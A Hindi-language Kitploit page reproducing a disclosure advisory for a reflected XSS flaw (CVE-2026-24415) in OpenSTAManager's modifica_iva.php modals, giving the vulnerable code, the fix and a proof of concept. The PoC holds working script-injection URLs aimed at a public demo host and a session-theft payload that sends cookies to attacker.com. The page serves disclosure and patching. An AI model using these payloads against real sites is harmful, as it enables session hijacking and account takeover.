Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24415 — CVE-2026-24415 - OpenSTAManager, modifica_iva.php में righe पैरामीटर के माध्यम से XSS से प्रभावित | Kitploit
उपकरण/GitHubGitHub/lukasz-rybak/cve-2026-24415
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHublukasz-rybak/cve-2026-24415

CVE-2026-24415

CVE-2026-24415 - OpenSTAManager, modifica_iva.php में righe पैरामीटर के माध्यम से XSS से प्रभावित

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-24415: OpenSTAManager modifica_iva.php में righe पैरामीटर के माध्यम से XSS से प्रभावित

अवलोकन

फ़ील्डविवरण
CVE आईडीCVE-2026-24415
गंभीरतामध्यम
परामर्शपरामर्श देखें
खोजकर्ताLukasz Rybak

प्रभावित उत्पाद

  • devcode-it/openstamanager (संस्करण: < 2.9.8)

CWE वर्गीकरण

  • CWE-79: वेब पेज निर्माण के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन ('क्रॉस-साइट स्क्रिप्टिंग')

विवरण

सारांश

OpenSTAManager v2.9.8 में कई रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यताएं बिना प्रमाणीकरण वाले हमलावरों को तैयार किए गए URL पैरामीटरों के माध्यम से अन्य उपयोगकर्ताओं के ब्राउज़रों के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती हैं, जिससे संभावित रूप से सत्र अपहरण, क्रेडेंशियल चोरी और अनधिकृत कार्रवाइयां हो सकती हैं।

असुरक्षित पैरामीटर: righe (GET)

विवरण

OpenSTAManager v2.9.8 में चालान/ऑर्डर/अनुबंध संशोधन मोडल में कई रिफ्लेक्टेड XSS भेद्यताएं हैं। एप्लिकेशन righe GET पैरामीटर से उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को HTML आउटपुट में प्रतिबिंबित करने से पहले ठीक से सैनिटाइज़ करने में विफल रहता है।

असुरक्षित कोड स्थान: फ़ाइल: /modules/contratti/modals/modifica_iva.php (पंक्ति 125)

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

$_GET['righe'] पैरामीटर को htmlspecialchars() या समकक्ष फ़ंक्शन का उपयोग करके किसी भी सैनिटाइज़ेशन के बिना सीधे HTML value विशेषता में इको किया जाता है। यह हमलावर को विशेषता संदर्भ से बाहर निकलने और मनमाना HTML/जावास्क्रिप्ट इंजेक्ट करने की अनुमति देता है।

सभी प्रभावित फ़ाइलें:

  1. /modules/contratti/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167
  2. /modules/preventivi/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167
  3. /modules/fatture/modals/modifica_iva.php - पंक्ति 121, पंक्ति 161
  4. /modules/ddt/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167
  5. /modules/ordini/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167
  6. /modules/interventi/modals/modifica_iva.php - पंक्ति 125, पंक्ति 167

PoC

पूर्वापेक्षाएँ:

  • OpenSTAManager v2.9.8 का चालू इंस्टेंस
  • मान्य व्यवस्थापक क्रेडेंशियल्स (टेस्ट इंस्टेंस के लिए उपयोगकर्ता नाम: admin, पासवर्ड: admin)

चरण 1: लॉगिन

root@kitploit:~
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

चरण 2: XSS ट्रिगर करें ब्राउज़र में निम्न URL पर नेविगेट करें (या कुकीज़ के साथ curl का उपयोग करें):

root@kitploit:~
http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

परीक्षित URLs (सभी असुरक्षित):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

अपेक्षित परिणाम: जावास्क्रिप्ट अलर्ट पॉपअप वर्तमान सत्र कुकी दिखाते हुए प्रदर्शित होता है, जो कोड निष्पादन की पुष्टि करता है।

HTML आउटपुट (लाइव इंस्टेंस पर सत्यापित):

root@kitploit:~
<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

सत्यापन:

छवि छवि

वैकल्पिक पेलोड: सत्र चोरी: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

प्रभाव

प्रभावित उपयोगकर्ता: अनुबंध, चालान, कोटेशन या ऑर्डर मॉड्यूल तक पहुंच वाले सभी प्रमाणित उपयोगकर्ता।

हमले का परिदृश्य:

  1. हमलावर XSS पेलोड के साथ दुर्भावनापूर्ण URL तैयार करता है
  2. हमलावर ईमेल/चैट/फ़िशिंग के माध्यम से पीड़ित को URL भेजता है
  3. पीड़ित (प्रमाणित उपयोगकर्ता) लिंक पर क्लिक करता है
  4. दुर्भावनापूर्ण जावास्क्रिप्ट पीड़ित के ब्राउज़र संदर्भ में निष्पादित होती है
  5. हमलावर यह कर सकता है:
    • सत्र कुकीज़ चुराना → पूर्ण खाता अधिग्रहण
    • पीड़ित की ओर से कार्रवाई करना (रिकॉर्ड बनाना/संशोधित करना/हटाना)
    • CSRF टोकन चुराना और CSRF सुरक्षा को बायपास करना
    • फ़िशिंग पेज पर रीडायरेक्ट करना
    • संवेदनशील डेटा कैप्चर करने के लिए कीलॉगर इंजेक्ट करना
    • क्रेडेंशियल्स प्रकट करने के लिए उपयोगकर्ता को धोखा देने हेतु पेज सामग्री संशोधित करना

अनुशंसित समाधान:

root@kitploit:~
<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

इस समाधान को विवरण अनुभाग में सूचीबद्ध सभी प्रभावित फ़ाइलों पर लागू करें।

संदर्भ

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24415
  • https://github.com/advisories/GHSA-jfgp-g7x7-j25j

अस्वीकरण

यह CVE समन्वित भेद्यता प्रकटीकरण प्रथाओं का पालन करते हुए जिम्मेदारी से प्रकट किया गया था। यहां दी गई जानकारी केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए है।

टूल डाउनलोड करें